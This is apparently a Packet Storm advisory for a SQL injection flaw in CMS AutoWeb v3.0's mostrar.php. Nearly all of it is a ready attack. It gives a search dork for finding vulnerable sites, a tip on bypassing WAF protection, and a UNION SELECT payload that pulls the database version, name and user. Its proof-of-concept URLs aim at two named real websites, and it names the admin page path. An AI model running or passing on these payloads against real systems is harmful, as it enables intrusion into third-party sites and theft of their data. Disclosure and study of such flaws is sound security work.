CMS AutoWeb version 3.0 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
279b5425a6bff2252c116322d11992c4e67a38e00cc18241d49877aabe59a709[+] Sql Injection on CMS AutoWeb v3.0
[+] Date: 24/09/2014
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.multdivision.com.br
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: mostrar.php
[+} Dork : inurl:"mostrar.php?id_noticia="
[+] Exploit : http://host/mostrar.php?id_noticia=[SQL Injection]
ps:need bypass the WAF protection use sql injection manual.
[+] PoC:
http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28%29,4,user%28%29,6,7,8,9,10--+ <-- example of how to xploit
http://fmg.edu.br/mostrar.php?id_noticia=77'
[+] Admin Page: http://host/admin/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed